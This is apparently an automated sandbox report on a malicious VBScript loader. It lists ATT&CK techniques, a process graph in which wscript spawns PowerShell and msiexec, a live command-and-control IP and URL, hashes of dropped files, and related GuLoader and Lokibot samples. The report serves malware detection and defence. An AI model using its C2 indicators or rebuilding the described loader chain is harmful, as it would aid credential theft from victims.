                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)111
                Process Injection                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522525 Sample: Bnnebgers.vbs Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 26 drive.usercontent.google.com 2->26 28 drive.google.com 2->28 36 Multi AV Scanner detection for domain / URL 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        signatures3 process4 signatures5 44 VBScript performs obfuscated calls to suspicious functions 8->44 46 Suspicious powershell command line found 8->46 48 Wscript starts Powershell (via cmd or directly) 8->48 54 2 other signatures 8->54 13 powershell.exe 14 18 8->13         started        50 Writes to foreign memory regions 11->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 11->52 17 msiexec.exe 1 89 11->17         started        20 conhost.exe 11->20         started        process6 dnsIp7 30 drive.usercontent.google.com 142.250.184.193, 443, 49731, 49739 GOOGLEUS United States 13->30 32 drive.google.com 142.250.185.206, 443, 49730, 49738 GOOGLEUS United States 13->32 56 Found suspicious powershell code related to unpacking or dynamic code loading 13->56 22 conhost.exe 13->22         started        34 137.184.191.215, 49740, 49741, 49743 PANDGUS United States 17->34 24 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 17->24 dropped 58 Tries to harvest and steal browser information (history, passwords, etc) 17->58 file8 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Bnnebgers.vbs5%VirustotalBrowse
                Bnnebgers.vbs3%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                drive.google.com0%VirustotalBrowse
                drive.usercontent.google.com1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                http://drive.usercontent.google.com1%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                http://137.184.191.215/index.php/03914%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                		142.250.185.206
                		truefalseunknown
                drive.usercontent.google.com
                		142.250.184.193
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/039trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.google.compowershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1845270492.000001CA485B4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000001.00000002.1845270492.000001CA47507000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000003.00000002.2700448526.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000001.00000002.1845270492.000001CA48576000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://drive.google.compowershell.exe, 00000001.00000002.1845270492.000001CA46B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA484CB000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1845270492.000001CA46DB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://drive.usercontent.google.com/pbmsiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://drive.google.compowershell.exe, 00000001.00000002.1845270492.000001CA4857B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://apis.google.compowershell.exe, 00000001.00000002.1845270492.000001CA485A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1845270492.000001CA46921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2683653620.0000000004E41000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2683653620.0000000004F98000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://drive.usercontent.google.com/Dbmsiexec.exe, 00000008.00000003.2185828059.0000000008857000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.185.206
                        		drive.google.comUnited States
                        		15169GOOGLEUSfalse
                        142.250.184.193
                        		drive.usercontent.google.comUnited States
                        		15169GOOGLEUSfalse
                        137.184.191.215
                        		unknownUnited States
                        		11003PANDGUStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1522525
                        Start date and time:2024-09-30 10:01:53 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Bnnebgers.vbs
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 67
                        • Number of non-executed functions: 19
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target msiexec.exe, PID 416 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 4348 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 6648 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:02:48API Interceptor86x Sleep call for process: powershell.exe modified
                        04:03:45API Interceptor26x Sleep call for process: msiexec.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        137.184.191.215PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/check.php?s=am9ntjjw
                        Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/check.php?s=am9ntjjw
                        B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/10899
                        ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/039
                        DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/10899
                        INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/check.php?s=am9ntjjw
                        #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/check?post=073989953
                        U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/10899
                        po.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/wp.php?view=1
                        WNIOSEK BUD#U017bETOWY 09-18-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215/index.php/check?post=073989953

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        PANDGUSSecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                        • 155.120.253.229
                        PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeDGet hashmaliciousHTMLPhisherBrowse
                        • 137.184.252.128
                        INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215
                        U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 137.184.191.215

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eQT2Q1292300924.vbsGet hashmaliciousFormBookBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        NTS_eTaxInvoice.html.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousGuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Urgent Quotation Notification_pdf.vbsGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousUnknownBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        37f463bf4616ecd445d4a1937da06e19NTS_eTaxInvoice.html.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 142.250.185.206
                        • 142.250.184.193

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Roaming\188E93\31437F.exeC7jdH7geD6.exeGet hashmaliciousUnknownBrowse
                          setup.exeGet hashmaliciousUnknownBrowse
                            #U67e5#U8be2#U5165#U53e3.exeGet hashmaliciousUnknownBrowse
                              sample.exeGet hashmaliciousUnknownBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):8003
                                Entropy (8bit):4.840877972214509
                                Encrypted:false
                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                MD5:106D01F562D751E62B702803895E93E0
                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllultnxj:NllU
                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ey4v2zi.ok2.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzubedel.xmm.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uecyenhh.sxt.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzqw4cmq.vcz.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\188E93\31437F.exe

                                Download File
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):59904
                                Entropy (8bit):5.770776695007155
                                Encrypted:false
                                SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                MD5:9D09DC1EDA745A5F87553048E57620CF
                                SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                Malicious:false
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                • Filename: setup.exe, Detection: malicious, Browse
                                • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                • Filename: sample.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\188E93\31437F.lck

                                Download File
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Roaming\Assimileringens.Lan

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):459596
                                Entropy (8bit):5.95668350371162
                                Encrypted:false
                                SSDEEP:6144:98vVaAaU50vqHcGEvkb8hleJTPnTHe1cYyca58G2D04eK4SH3Tl6qSFLqmc+9Hg:9T+0CHcGLbYWvKcrBI04N4SX56nE
                                MD5:FDB92DF6A107CB2E9CBF0556FB7D9583
                                SHA1:FB1D9D5B30862F5EAF7E14B9FF9697D96500C71D
                                SHA-256:0B63D26CB8E521B1E3264B3F0A208A94A32B027738DD94722562332F55A321DD
                                SHA-512:2B22B4BB6E84E69FD7C0A7EDCEFC11761538F42A35F65B83BE1DE99FC932BA15D3E81D42471973B1AD0CA7B122E71E1F955CB8404BADD269ADCA7FCE679275EF
                                Malicious:false
